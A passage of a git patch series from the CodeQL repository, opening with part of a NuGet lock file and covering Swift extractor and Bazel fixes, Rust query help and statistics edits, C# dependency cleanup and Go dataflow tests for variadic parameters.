"sha512-LYOfElsnLTHsEs7VRd07mBiQjJos15mst8jP0v0zRx+t1OgUMUbbmQx6yO2fOww7vCyaX7vwXsoNuVJSdJdHPA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePackAnalyzer", "id": "MessagePackAnalyzer", "version": "3.0.3", "sha512": "sha512-gsMDGQbQv5dwGGKo2N6mC4TvIVaqKHqowgtqOMcVDLPnYUFdCViW2A+sssnBXJLR4m+zbFVHI7EBSR86svG+AQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "9.0.0", "sha512": "sha512-bYp2ksSR5uB6xqOa4NyD2gBOeFrc2n8FAWoh781MNMDcPjk1ysD7DNpv7r7sQOXfdFJT6F/syX7fN4lmUsn+RQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, From a4f7981d9326850094d8ed870e0b77581db6c6f6 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 14:44:01 +0100 Subject: [PATCH 0881/1267] Swift: accept test changes --- .../stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected | 2 ++ swift/ql/test/library-tests/ast/PrintAst.expected | 7 +++---- 2 files changed, 5 insertions(+), 4 deletions(-) create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected new file mode 100644 index 00000000000..d238c6b5a40 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected @@ -0,0 +1,2 @@ +deadEnd +| for.swift:12:33:12:56 | array | diff --git a/swift/ql/test/library-tests/ast/PrintAst.expected b/swift/ql/test/library-tests/ast/PrintAst.expected index 07713e4c28d..879de94c833 100644 --- a/swift/ql/test/library-tests/ast/PrintAst.expected +++ b/swift/ql/test/library-tests/ast/PrintAst.expected @@ -3310,12 +3310,11 @@ cfg.swift: # 533| getBase().getFullyConverted(): [LoadExpr] (AsyncStream) ... #-----| getMethodRef(): [DeclRefExpr] makeAsyncIterator() # 533| getPattern(0): [NamedPattern] $i$generator -# 533| getNextCall(): [CallExpr] call to next(isolation:) -# 533| getFunction(): [MethodLookupExpr] .next(isolation:) +# 533| getNextCall(): [CallExpr] call to next() +# 533| getFunction(): [MethodLookupExpr] .next() # 533| getBase(): [DeclRefExpr] $i$generator # 533| getBase().getFullyConverted(): [InOutExpr] &... -#-----| getMethodRef(): [DeclRefExpr] next(isolation:) -# 533| getArgument(0): (no string representation) +#-----| getMethodRef(): [DeclRefExpr] next() # 533| getNextCall().getFullyConverted(): [AwaitExpr] await ... # 533| getBody(): [BraceStmt] { ... } # 534| getElement(0): [CallExpr] call to print(_:separator:terminator:) From a82d37e05c6893e500b66e653af76ee118e8b24d Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 14:45:24 +0100 Subject: [PATCH 0882/1267] Swift: fix gracefully accepting missing `ForEachStmt.iteratorVar` --- swift/extractor/translators/StmtTranslator.cpp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/extractor/translators/StmtTranslator.cpp b/swift/extractor/translators/StmtTranslator.cpp index f46411e6f12..00c4b94fa85 100644 --- a/swift/extractor/translators/StmtTranslator.cpp +++ b/swift/extractor/translators/StmtTranslator.cpp @@ -74,7 +74,7 @@ codeql::ForEachStmt StmtTranslator::translateForEachStmt(const swift::ForEachStm fillLabeledStmt(stmt, entry); entry.body = dispatcher.fetchLabel(stmt.getBody()); entry.pattern = dispatcher.fetchLabel(stmt.getPattern()); - entry.iteratorVar = dispatcher.fetchLabel(stmt.getIteratorVar()); + entry.iteratorVar = dispatcher.fetchOptionalLabel(stmt.getIteratorVar()); entry.where = dispatcher.fetchOptionalLabel(stmt.getWhere()); entry.nextCall = dispatcher.fetchOptionalLabel(stmt.getNextCall()); auto add_variable = [&](swift::VarDecl* var) { From f637b3b1f3588c4a80b6e4bc06941c1ffb20bb14 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 14:20:40 +0000 Subject: [PATCH 0883/1267] Apply suggestions from code review Co-authored-by: mc <42146119+mchammer01@users.noreply.github.com> --- .../queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp index f93c77e83f2..e24222e09fc 100644 --- a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp @@ -42,8 +42,8 @@

    - Instead we should use a strong modern algorithm. In this - case we have selected the 256-bit version of the AES + Instead, we should use a strong modern algorithm. In this + case, we have selected the 256-bit version of the AES algorithm.

    @@ -52,8 +52,8 @@ -
  • NIST, FIPS 140 Annex a: Approved Security Functions.
    • -
  • NIST, SP 800-131A: Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths.
    • +
  • NIST, FIPS 140 Annex A: Approved Security Functions.
    • +
  • NIST, SP 800-131A Revision 2: Transitioning the Use of Cryptographic Algorithms and Key Lengths.
  • OWASP: Cryptographic Storage Cheat Sheet - Algorithms.
    • From 263bd69636d9e1d2538eaeee9bfc8dd460ad3a17 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 15:00:41 +0100 Subject: [PATCH 0884/1267] Swift: fix artifact update infrastructure --- MODULE.bazel | 2 ++ swift/third_party/load.bzl | 12 ++++++++++++ swift/third_party/resources/BUILD.bazel | 8 +++++--- swift/third_party/resources/update.sh | 0 4 files changed, 19 insertions(+), 3 deletions(-) mode change 100644 => 100755 swift/third_party/resources/update.sh diff --git a/MODULE.bazel b/MODULE.bazel index ab54b44b6bb..9e3714e0967 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -96,7 +96,9 @@ use_repo( "binlog", "picosha2", "swift-prebuilt-linux", + "swift-prebuilt-linux-download-only", "swift-prebuilt-macos", + "swift-prebuilt-macos-download-only", "swift-resource-dir-linux", "swift-resource-dir-macos", ) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 542eec4d9f9..9cdc16a85d2 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -47,6 +47,12 @@ def _load_prebuilt(plat): build_file = build, **override ) + + # this is for `//swift/third_party/resources:update-prebuilt-*` support + http_file( + name = name + "-download-only", + **override + ) else: lfs_archive( name = name, @@ -54,6 +60,12 @@ def _load_prebuilt(plat): build_file = build, ) + # unused, but saves us some bazel mod tidy dance when in override mode + lfs_files( + name = name + "-download-only", + srcs = ["//swift/third_party/resources:%s" % file], + ) + def _github_archive(*, name, repository, commit, build_file = None, sha256 = None): github_name = repository[repository.index("/") + 1:] maybe( diff --git a/swift/third_party/resources/BUILD.bazel b/swift/third_party/resources/BUILD.bazel index 8c26788e411..1677110df75 100644 --- a/swift/third_party/resources/BUILD.bazel +++ b/swift/third_party/resources/BUILD.bazel @@ -25,23 +25,25 @@ alias( name = "update-%s-%s" % (what, os), srcs = ["update.sh"], args = [ - "$(rlocationpath %s)" % what, + "$(rlocationpath %s)" % source, "$(rlocationpath %s)" % target, ], data = [ - what, + source, target, ], deps = ["//misc/bazel:sh_runfiles"], ) for os in _oses - for what, target in ( + for what, source, target in ( ( "prebuilt", + "@swift-prebuilt-%s-download-only//file" % os, "swift-prebuilt-%s.tar.zst" % os, ), ( "dir", + "@swift-resource-dir-%s//file" % os, "resource-dir-%s.zip" % os, ), ) diff --git a/swift/third_party/resources/update.sh b/swift/third_party/resources/update.sh old mode 100644 new mode 100755 From 926d65bceca9074a8bb0bad3cf0839036a375d2b Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 15:21:02 +0100 Subject: [PATCH 0885/1267] Swift: update LFS artifacts and remove override --- swift/third_party/load.bzl | 4 ---- swift/third_party/resources/resource-dir-linux.zip | 4 ++-- swift/third_party/resources/resource-dir-macos.zip | 4 ++-- swift/third_party/resources/swift-prebuilt-linux.tar.zst | 3 +++ swift/third_party/resources/swift-prebuilt-macos.tar.zst | 3 +++ 5 files changed, 10 insertions(+), 8 deletions(-) create mode 100644 swift/third_party/resources/swift-prebuilt-linux.tar.zst create mode 100644 swift/third_party/resources/swift-prebuilt-macos.tar.zst diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 9cdc16a85d2..455f7dfefee 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -5,10 +5,6 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main - "swift-prebuilt-macOS-swift-6.0.2-RELEASE-25.tar.zst": "4c81917da67ff2bb642ef2e34e005466b06f756c958702ec070bcacdb83c2f76", - "swift-prebuilt-Linux-swift-6.0.2-RELEASE-25.tar.zst": "af1e3355fb476538449424a74f15ce21a0f877c7f85a568e736f0bd6c0239a8f", - "resource-dir-macOS-swift-6.0.2-RELEASE-33.zip": "38f48790fea144b7cf5918b885f32a0f68e21aa5f3c2f0a5722573cc9e950639", - "resource-dir-Linux-swift-6.0.2-RELEASE-33.zip": "403374c72e20299951c2c37185404500d15340baaa52bb2d06f8815b03f8071e", } _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{}/{}" diff --git a/swift/third_party/resources/resource-dir-linux.zip b/swift/third_party/resources/resource-dir-linux.zip index dc52894ec90..2c45df3aa03 100644 --- a/swift/third_party/resources/resource-dir-linux.zip +++ b/swift/third_party/resources/resource-dir-linux.zip @@ -1,3 +1,3 @@ version https://git-lfs.github.com/spec/v1 -oid sha256:02bf1b93c60917b09e5de24f7a3a96e109337fedb7ee1cc0c2409d829866dbfe -size 190645227 +oid sha256:403374c72e20299951c2c37185404500d15340baaa52bb2d06f8815b03f8071e +size 318874108 diff --git a/swift/third_party/resources/resource-dir-macos.zip b/swift/third_party/resources/resource-dir-macos.zip index cfc59553219..c358585ea65 100644 --- a/swift/third_party/resources/resource-dir-macos.zip +++ b/swift/third_party/resources/resource-dir-macos.zip @@ -1,3 +1,3 @@ version https://git-lfs.github.com/spec/v1 -oid sha256:8e29feb39124731510535f8d98be80bc68b10ff0e791c909c9ff96a9b97391fa -size 483440694 +oid sha256:38f48790fea144b7cf5918b885f32a0f68e21aa5f3c2f0a5722573cc9e950639 +size 653096176 diff --git a/swift/third_party/resources/swift-prebuilt-linux.tar.zst b/swift/third_party/resources/swift-prebuilt-linux.tar.zst new file mode 100644 index 00000000000..0a1fe2b3f4d --- /dev/null +++ b/swift/third_party/resources/swift-prebuilt-linux.tar.zst @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af1e3355fb476538449424a74f15ce21a0f877c7f85a568e736f0bd6c0239a8f +size 118694583 diff --git a/swift/third_party/resources/swift-prebuilt-macos.tar.zst b/swift/third_party/resources/swift-prebuilt-macos.tar.zst new file mode 100644 index 00000000000..f69024bd10d --- /dev/null +++ b/swift/third_party/resources/swift-prebuilt-macos.tar.zst @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c81917da67ff2bb642ef2e34e005466b06f756c958702ec070bcacdb83c2f76 +size 101405609 From d7d4658aaedba635fad11516c2dbe77b76b73c05 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 14:52:55 +0000 Subject: [PATCH 0886/1267] Rust: Add % of files extractor without errors to summary stats. --- rust/ql/src/queries/summary/SummaryStats.ql | 5 +++++ rust/ql/test/query-tests/diagnostics/SummaryStats.expected | 1 + 2 files changed, 6 insertions(+) diff --git a/rust/ql/src/queries/summary/SummaryStats.ql b/rust/ql/src/queries/summary/SummaryStats.ql index ffe7cbf1a8f..2e30fde143a 100644 --- a/rust/ql/src/queries/summary/SummaryStats.ql +++ b/rust/ql/src/queries/summary/SummaryStats.ql @@ -32,6 +32,11 @@ where key = "Files extracted - without errors" and value = count(SuccessfullyExtractedFile f | exists(f.getRelativePath())) or + key = "Files extracted - without errors %" and + value = + (count(SuccessfullyExtractedFile f | exists(f.getRelativePath())) * 100) / + count(ExtractedFile f | exists(f.getRelativePath())) + or key = "Lines of code extracted" and value = getLinesOfCode() or key = "Lines of user code extracted" and value = getLinesOfUserCode() diff --git a/rust/ql/test/query-tests/diagnostics/SummaryStats.expected b/rust/ql/test/query-tests/diagnostics/SummaryStats.expected index 9372843039c..a5295af6e10 100644 --- a/rust/ql/test/query-tests/diagnostics/SummaryStats.expected +++ b/rust/ql/test/query-tests/diagnostics/SummaryStats.expected @@ -5,6 +5,7 @@ | Files extracted - total | 7 | | Files extracted - with errors | 3 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 57 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | From 4e079d34b9bc75efeda51f573d5626655e9581d8 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Dec 2024 15:55:30 +0100 Subject: [PATCH 0887/1267] C#: Clean up dependencies Newtonsoft.Json and dont override nowarn. --- csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel | 1 - csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references | 1 - .../Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel | 2 +- .../paket.references | 1 + 4 files changed, 2 insertions(+), 3 deletions(-) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel index 99cf29e5220..7ef9b1eb5b3 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel @@ -17,6 +17,5 @@ codeql_csharp_binary( "//csharp/extractor/Semmle.Extraction.CSharp.Standalone:bin/Semmle.Extraction.CSharp.Standalone", "//csharp/extractor/Semmle.Util", "@paket.main//microsoft.build", - "@paket.main//newtonsoft.json", ], ) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references b/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references index 53fe17d215e..ec65ce95b91 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references @@ -1,2 +1 @@ -Newtonsoft.Json Microsoft.Build diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel index 4be9954a274..8be8aaa8408 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel @@ -11,10 +11,10 @@ codeql_csharp_library( ]), allow_unsafe_blocks = True, internals_visible_to = ["Semmle.Extraction.Tests"], - nowarn = ["CA1822"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp", "//csharp/extractor/Semmle.Util", + "@paket.main//newtonsoft.json", ], ) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references index e69de29bb2d..99e44f5d76e 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references @@ -0,0 +1 @@ +Newtonsoft.Json From 1935c26b568906b9544881864c0771bb28e9dfb3 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 14:15:41 +0000 Subject: [PATCH 0888/1267] Trivial variable name fixes --- .../semmle/go/dataflow/ExternalValueFlow/completetest.ql | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql index 372283d0a6c..efd5f0d5bb3 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql @@ -9,9 +9,9 @@ import semmle.go.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl import TestUtilities.InlineFlowTest module Config implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node src) { sourceNode(src, "qltest") } + predicate isSource(DataFlow::Node source) { sourceNode(source, "qltest") } - predicate isSink(DataFlow::Node src) { sinkNode(src, "qltest") } + predicate isSink(DataFlow::Node sink) { sinkNode(sink, "qltest") } } import ValueFlowTest From ec7cbf93d9f887c932b1bb780eb104a04349da40 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 10:45:04 +0000 Subject: [PATCH 0889/1267] Add failing test for flow out of varargs parameter --- .../library-tests/semmle/go/dataflow/VarArgs/main.go | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go index 8e3a498656a..84e76965980 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go @@ -4,7 +4,7 @@ func source() string { return "untrusted data" } -func sink(string) { +func sink(any) { } type A struct { @@ -19,6 +19,10 @@ func functionWithVarArgsParameter(s ...string) string { return s[1] } +func functionWithVarArgsOutParameter(in string, out ...*string) { + *out[0] = in +} + func functionWithSliceOfStructsParameter(s []A) string { return s[1].f } @@ -38,6 +42,12 @@ func main() { sink(functionWithVarArgsParameter(sSlice...)) // $ hasValueFlow="call to functionWithVarArgsParameter" sink(functionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to functionWithVarArgsParameter" + var out1 *string + var out2 *string + functionWithVarArgsOutParameter(source(), out1, out2) + sink(out1) // $ MISSING: hasValueFlow="out1" + sink(out2) // $ MISSING: hasValueFlow="out2" + sliceOfStructs := []A{{f: source()}} sink(sliceOfStructs[0].f) // $ hasValueFlow="selection of f" From 69f087a46d582772686e2d075d7ed2e5bc5e19bf Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 13:17:18 +0000 Subject: [PATCH 0890/1267] Fix pre-existing failing test in VarArgsWithFunctionModels It was failing for a silly reason. --- .../go/dataflow/VarArgsWithFunctionModels/main.go | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go index c561de0da2f..f7248f1f6a2 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go @@ -21,10 +21,11 @@ func main() { s0 := "" s1 := source() sSlice := []string{s0, s1} - sink(test.FunctionWithParameter(sSlice[1])) // $ hasValueFlow="call to FunctionWithParameter" - sink(test.FunctionWithSliceParameter(sSlice)) // $ hasTaintFlow="call to FunctionWithSliceParameter" MISSING: hasValueFlow="call to FunctionWithSliceParameter" - sink(test.FunctionWithVarArgsParameter(sSlice...)) // $ hasTaintFlow="call to FunctionWithVarArgsParameter" MISSING: hasValueFlow="call to FunctionWithVarArgsParameter" - sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ MISSING: hasValueFlow="call to FunctionWithVarArgsParameter" + sink(test.FunctionWithParameter(sSlice[1])) // $ hasValueFlow="call to FunctionWithParameter" + sink(test.FunctionWithSliceParameter(sSlice)) // $ hasTaintFlow="call to FunctionWithSliceParameter" MISSING: hasValueFlow="call to FunctionWithSliceParameter" + sink(test.FunctionWithVarArgsParameter(sSlice...)) // $ hasTaintFlow="call to FunctionWithVarArgsParameter" MISSING: hasValueFlow="call to FunctionWithVarArgsParameter" + randomFunctionWithMoreThanOneParameter(1, 2, 3, 4, 5) // This is needed to make the next line pass, because we need to have seen a call to a function with at least 2 parameters for ParameterInput to exist with index 1. + sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to FunctionWithVarArgsParameter" sliceOfStructs := []test.A{{Field: source()}} sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field" @@ -37,3 +38,6 @@ func main() { sink(test.FunctionWithVarArgsOfStructsParameter(aSlice...)) // $ MISSING: hasValueFlow="call to FunctionWithVarArgsOfStructsParameter" sink(test.FunctionWithVarArgsOfStructsParameter(a0, a1)) // $ MISSING: hasValueFlow="call to FunctionWithVarArgsOfStructsParameter" } + +func randomFunctionWithMoreThanOneParameter(i1, i2, i3, i4, i5 int) { +} From 1612a7a9a07a1f8f78c9a158622e133675622ad2 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 13:40:08 +0000 Subject: [PATCH 0891/1267] Delete accidentally committed binary --- .../semmle.go.Packages | Bin 1142176 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100755 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/semmle.go.Packages diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/semmle.go.Packages b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/semmle.go.Packages deleted file mode 100755 index e3880ac8d5d9d893c3ee41a8c4aafe2702f1a859..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1142176 zcmeFaYj{-E6+b+=3=EfWhMR<&1RFGXfrOih7@c6iGdRJZs3^2Vgb0cf!wdvLoiGV- z9FC5NXsfkot@fg=T8ju?5-v$Vs{twkv5H!CkE0gRa*HMZ-*4|TlbIyY{@?e*`+jJi zCv*1Mm$lbkd+oK?TKjU|JNeD2&Nf?8ip^$A#(y{b=XSx5_17Oy9sjdt6&GAN@urE_ zTpdk`J(FUgGXw~y0u{`fHErVbX$cusc|U88`?KDGo6U}YKKVCmmUnK2SB2Gk8+cBe zgjakiOX1I{%BvUrrrP|mFaon?En0fV?1c+vE%N$i=d{PK#ABE6KC%koUE&jk;jrL! zvLa^9DqlF~X7A0>^tSDF6)AW{!%1zM4etr?qUEAbw0CLQ+y(RRyj{h#g|}gGXNlk6 z6gV5+{{y`F-kWEi9$v*#1cz}P5<$r6x-nwws zY~TC^bLQV!x{!R*F}w_vk$-@f8Vz^woHgrC@SI}3GH-c1co`OcSrSW|4exS%MnMs; zVbK>n0dFDT#8|H_ekGNvy(K+WA-tcFZnI{^K*<7a;nl2F@UqWV@bLa0;LTpNNM-F1 zp6w+CZ(hV=WaNtPSBnfW2v&PzK-=Qyf1-yhk})+_d{Nr<&3U>JW;`dJ5Q z@XkNR=i*=D!U*dxmKXW2UAo9S_l^-0MxfmM+0h*Td;X6C|D(YFDDXcD{Eq_v|D`}n 